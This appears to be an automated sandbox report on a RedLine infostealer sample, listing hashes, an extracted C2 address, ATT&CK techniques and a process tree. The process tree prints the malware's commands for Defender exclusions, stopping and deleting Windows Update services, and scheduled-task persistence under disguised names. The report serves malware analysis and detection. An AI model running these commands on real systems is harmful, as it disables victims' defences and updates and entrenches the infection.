redline | 84806d7ed59a57fce9b4bb07519d78f25edd45c5e56c5739a252f4b4b3c701e2

General

Target

63c02bf79ba67e69dfb5b5f115986f8b.exe
Size

242KB
MD5

63c02bf79ba67e69dfb5b5f115986f8b
SHA1

0282d75ca0ef8167e1798ab5925bdddf604753c9
SHA256

84806d7ed59a57fce9b4bb07519d78f25edd45c5e56c5739a252f4b4b3c701e2
SHA512

0b2923317ef6cd3b034f61a22ad47ea95a4bf4de6c5f11a04a22a638f6c6de7c5d80dd844f6608de40a746c40f7a3e468d8daba26f7f81807e8c6b0b3844ebea
SSDEEP

6144:71gE5wi2UCeNWGa+nMzVWMNQErpV2IviDnye3sEuYq7Z:pgEaACe1a+nMzVWMNQErpV2IvQypEuYa

Score

10^/10

redline infostealer spyware

Malware Config

Extracted

Family

redline

C2

37.220.87.2:27924

Attributes

auth_value
e457de0f8e67971846447e9d0f415966

Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 4 IoCs

Processes:

resource	yara_rule
behavioral1/memory/340-56-0x0000000000400000-0x0000000000428000-memory.dmp	family_redline
behavioral1/memory/340-61-0x000000000042280E-mapping.dmp	family_redline
behavioral1/memory/340-62-0x0000000000400000-0x0000000000428000-memory.dmp	family_redline
behavioral1/memory/340-63-0x0000000000400000-0x0000000000428000-memory.dmp	family_redline

Downloads MZ/PE file
Executes dropped EXE 2 IoCs

Processes:

brave.exeofg.exe

pid process

1744 brave.exe
944 ofg.exe
Loads dropped DLL 2 IoCs

Processes:

vbc.exe

pid process

340 vbc.exe
340 vbc.exe
Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Suspicious use of SetThreadContext 1 IoCs

Processes:

63c02bf79ba67e69dfb5b5f115986f8b.exe

description pid process target process

PID 1156 set thread context of 340 1156 63c02bf79ba67e69dfb5b5f115986f8b.exe vbc.exe
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

1168 1156 WerFault.exe 63c02bf79ba67e69dfb5b5f115986f8b.exe
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

SCHTASKS.exe

pid process

1992 SCHTASKS.exe
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

vbc.exe

pid process

340 vbc.exe
340 vbc.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

vbc.exe

description pid process

Token: SeDebugPrivilege 340 vbc.exe

pid	process
1744	brave.exe
944	ofg.exe

pid	process
340	vbc.exe
340	vbc.exe

description	pid	process	target process
PID 1156 set thread context of 340	1156	63c02bf79ba67e69dfb5b5f115986f8b.exe	vbc.exe

pid	pid_target	process	target process
1168	1156	WerFault.exe	63c02bf79ba67e69dfb5b5f115986f8b.exe

pid	process
1992	SCHTASKS.exe

pid	process
340	vbc.exe
340	vbc.exe

description	pid	process
Token: SeDebugPrivilege	340	vbc.exe

Suspicious use of WriteProcessMemory 34 IoCs

Processes:

63c02bf79ba67e69dfb5b5f115986f8b.exevbc.exeofg.exebrave.exe

description	pid	process	target process
PID 1156 wrote to memory of 340	1156	63c02bf79ba67e69dfb5b5f115986f8b.exe	vbc.exe
PID 1156 wrote to memory of 340	1156	63c02bf79ba67e69dfb5b5f115986f8b.exe	vbc.exe
PID 1156 wrote to memory of 340	1156	63c02bf79ba67e69dfb5b5f115986f8b.exe	vbc.exe
PID 1156 wrote to memory of 340	1156	63c02bf79ba67e69dfb5b5f115986f8b.exe	vbc.exe
PID 1156 wrote to memory of 340	1156	63c02bf79ba67e69dfb5b5f115986f8b.exe	vbc.exe
PID 1156 wrote to memory of 340	1156	63c02bf79ba67e69dfb5b5f115986f8b.exe	vbc.exe
PID 1156 wrote to memory of 1168	1156	63c02bf79ba67e69dfb5b5f115986f8b.exe	WerFault.exe
PID 1156 wrote to memory of 1168	1156	63c02bf79ba67e69dfb5b5f115986f8b.exe	WerFault.exe
PID 1156 wrote to memory of 1168	1156	63c02bf79ba67e69dfb5b5f115986f8b.exe	WerFault.exe
PID 1156 wrote to memory of 1168	1156	63c02bf79ba67e69dfb5b5f115986f8b.exe	WerFault.exe
PID 340 wrote to memory of 1744	340	vbc.exe	brave.exe
PID 340 wrote to memory of 1744	340	vbc.exe	brave.exe
PID 340 wrote to memory of 1744	340	vbc.exe	brave.exe
PID 340 wrote to memory of 1744	340	vbc.exe	brave.exe
PID 340 wrote to memory of 944	340	vbc.exe	ofg.exe
PID 340 wrote to memory of 944	340	vbc.exe	ofg.exe
PID 340 wrote to memory of 944	340	vbc.exe	ofg.exe
PID 340 wrote to memory of 944	340	vbc.exe	ofg.exe
PID 944 wrote to memory of 1992	944	ofg.exe	SCHTASKS.exe
PID 944 wrote to memory of 1992	944	ofg.exe	SCHTASKS.exe
PID 944 wrote to memory of 1992	944	ofg.exe	SCHTASKS.exe
PID 944 wrote to memory of 1992	944	ofg.exe	SCHTASKS.exe
PID 1744 wrote to memory of 1132	1744	brave.exe	powershell.exe
PID 1744 wrote to memory of 1132	1744	brave.exe	powershell.exe
PID 1744 wrote to memory of 1132	1744	brave.exe	powershell.exe
PID 1744 wrote to memory of 1000	1744	brave.exe	cmd.exe
PID 1744 wrote to memory of 1000	1744	brave.exe	cmd.exe
PID 1744 wrote to memory of 1000	1744	brave.exe	cmd.exe
PID 1744 wrote to memory of 1608	1744	brave.exe	cmd.exe
PID 1744 wrote to memory of 1608	1744	brave.exe	cmd.exe
PID 1744 wrote to memory of 1608	1744	brave.exe	cmd.exe
PID 1744 wrote to memory of 1296	1744	brave.exe	powershell.exe
PID 1744 wrote to memory of 1296	1744	brave.exe	powershell.exe
PID 1744 wrote to memory of 1296	1744	brave.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\63c02bf79ba67e69dfb5b5f115986f8b.exe
"C:\Users\Admin\AppData\Local\Temp\63c02bf79ba67e69dfb5b5f115986f8b.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1156

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
2⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:340

C:\Users\Admin\AppData\Local\Google\brave.exe
"C:\Users\Admin\AppData\Local\Google\brave.exe"
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1744

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
4⤵
PID:1132

C:\Windows\system32\cmd.exe
cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
4⤵
PID:1000

C:\Windows\system32\cmd.exe
cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
4⤵
PID:1608

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
4⤵
PID:1296

C:\Users\Admin\AppData\Local\Google\ofg.exe
"C:\Users\Admin\AppData\Local\Google\ofg.exe"
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:944

C:\Windows\SysWOW64\SCHTASKS.exe
SCHTASKS /Create /TR "C:\Users\Admin\AppData\Local\Google\ofg.exe" /TN "MicrosoftEdge{e60e5877-76e2-4b84-98a8-90161a4b47ca}" /SC ONLOGON /F /RL HIGHEST
4⤵
- Creates scheduled task(s)
PID:1992

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1156 -s 48
2⤵
- Program crash
PID:1168

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scripting

1

T1064

Scheduled Task

1

T1053

Persistence

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Scripting

1

T1064

Credential Access

Credentials in Files

1

T1081

Discovery

Lateral Movement

Collection

Data from Local System

1

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\brave.exe
Filesize
2.8MB

MD5
9253ed091d81e076a3037e12af3dc871

SHA1
ec02829a25b3bf57ad061bbe54180d0c99c76981

SHA256
78e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859

SHA512
29ff2fd5f150d10b2d281a45df5b44873192605de8dc95278d6a7b5053370e4ac64a47100b13c63f3c048df351a9b51f0b93af7d922399a91508a50c152e8cf4

Download Submit
C:\Users\Admin\AppData\Local\Google\ofg.exe
Filesize
86KB

MD5
33dad992607d0ffd44d2c81fe67f8fb1

SHA1
e5b67dc05505fb1232504231f41cba225c282d3c

SHA256
95903d8c2d48c4c0667e41878807f646f7648a33ed25d0eb433aab41c25e31a4

SHA512
444973b44292c433a07e5f75f6580ea71799b1f835677bc5b2e42af6b567a2f70f1b038f019d250a18216701ccf901b300632487eebcc1113ac803edb43159e4

Download Submit
\Users\Admin\AppData\Local\Google\brave.exe
Filesize
2.8MB

MD5
9253ed091d81e076a3037e12af3dc871

SHA1
ec02829a25b3bf57ad061bbe54180d0c99c76981

SHA256
78e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859

SHA512
29ff2fd5f150d10b2d281a45df5b44873192605de8dc95278d6a7b5053370e4ac64a47100b13c63f3c048df351a9b51f0b93af7d922399a91508a50c152e8cf4

Download Submit
\Users\Admin\AppData\Local\Google\ofg.exe
Filesize
86KB

MD5
33dad992607d0ffd44d2c81fe67f8fb1

SHA1
e5b67dc05505fb1232504231f41cba225c282d3c

SHA256
95903d8c2d48c4c0667e41878807f646f7648a33ed25d0eb433aab41c25e31a4

SHA512
444973b44292c433a07e5f75f6580ea71799b1f835677bc5b2e42af6b567a2f70f1b038f019d250a18216701ccf901b300632487eebcc1113ac803edb43159e4

Download Submit
memory/340-63-0x0000000000400000-0x0000000000428000-memory.dmp

Filesize
160KB

Download
memory/340-54-0x0000000000400000-0x0000000000428000-memory.dmp

Filesize
160KB

Download
memory/340-65-0x0000000075671000-0x0000000075673000-memory.dmp

Filesize
8KB

Download
memory/340-56-0x0000000000400000-0x0000000000428000-memory.dmp

Filesize
160KB

Download
memory/340-62-0x0000000000400000-0x0000000000428000-memory.dmp

Filesize
160KB

Download
memory/340-61-0x000000000042280E-mapping.dmp

Download
memory/944-70-0x0000000000000000-mapping.dmp

Download
memory/1000-75-0x0000000000000000-mapping.dmp

Download
memory/1132-73-0x0000000000000000-mapping.dmp

Download
memory/1132-74-0x000007FEFB6F1000-0x000007FEFB6F3000-memory.dmp

Filesize
8KB

Download
memory/1168-64-0x0000000000000000-mapping.dmp

Download
memory/1296-77-0x0000000000000000-mapping.dmp

Download
memory/1608-76-0x0000000000000000-mapping.dmp

Download
memory/1744-67-0x0000000000000000-mapping.dmp

Download
memory/1992-72-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads